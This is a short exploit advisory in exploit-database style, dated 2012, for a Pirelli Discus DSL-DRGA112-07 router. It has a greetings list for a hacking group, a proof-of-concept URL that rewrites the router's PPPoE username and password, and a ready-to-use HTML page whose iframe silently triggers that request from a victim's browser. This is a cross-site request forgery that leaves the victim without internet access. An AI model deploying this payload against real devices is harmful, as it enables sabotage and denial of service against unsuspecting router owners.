# Exploit Title: Pirelli Discus DSL-DRGA112-07 Remote Change Password
# Date: 17/02/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Hardware: Pirelli Discus DSL-DRGA112-07 DSL-DRGA112-07
# Tested on: Linux
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.comar
#RemoteExecution Hacking Group
[PoC]
failure may be exploited if the attacker makes his victim enter the following URL:
http://10.0.0.2/wansinglecfg.cmd?action=modify&UsernamePPP = [number] & PasswordPPP = [password]
automatically be reset his connection with new data and therefore will not have internet connection and your data will be modified.
[Exploit]
<html>
<head>
</head>
<body>
<iframe src="http://10.0.0.2/wansinglecfg.cmd?action=modify&UsernamePPP=[number]&PasswordPPP=[password]">
</body>
</html>
